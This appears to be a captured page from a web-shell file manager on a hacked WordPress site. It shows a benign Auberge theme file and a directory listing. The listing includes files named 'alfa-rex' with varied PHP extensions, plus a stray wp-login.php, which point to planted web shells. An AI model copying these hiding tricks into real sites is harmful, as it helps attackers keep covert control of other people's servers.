PATH:
home
/
cuisinesj
/
www
/
new
/
wp-content
/
themes
/
auberge
/
includes
/
welcome
<?php /** * Welcome Page * * @package Auberge * @copyright WebMan Design, Oliver Juhas * * @since 2.1 * @version 2.1 * * Contents: * * 1) Requirements check * 10) Admin page */ /** * 1) Requirements check */ if ( ! is_admin() || ! get_theme_mod( 'others_welcome_page', true ) ) { return; } /** * 10) Admin page */ require_once( 'class-welcome.php' );
[+]
..
[-] about.php
[edit]
[-] wp-login.php
[edit]
[-] .htaccess
[edit]
[-] alfa-rex.php8
[edit]
[-] alfa-rex.PhP7
[edit]
[-] alfa-rex.PHP
[edit]
[-] index.php
[edit]
[-] welcome.php
[edit]
[-] class-welcome.php
[edit]
[-] about.php7
[edit]
[-] alfa-rex.php56
[edit]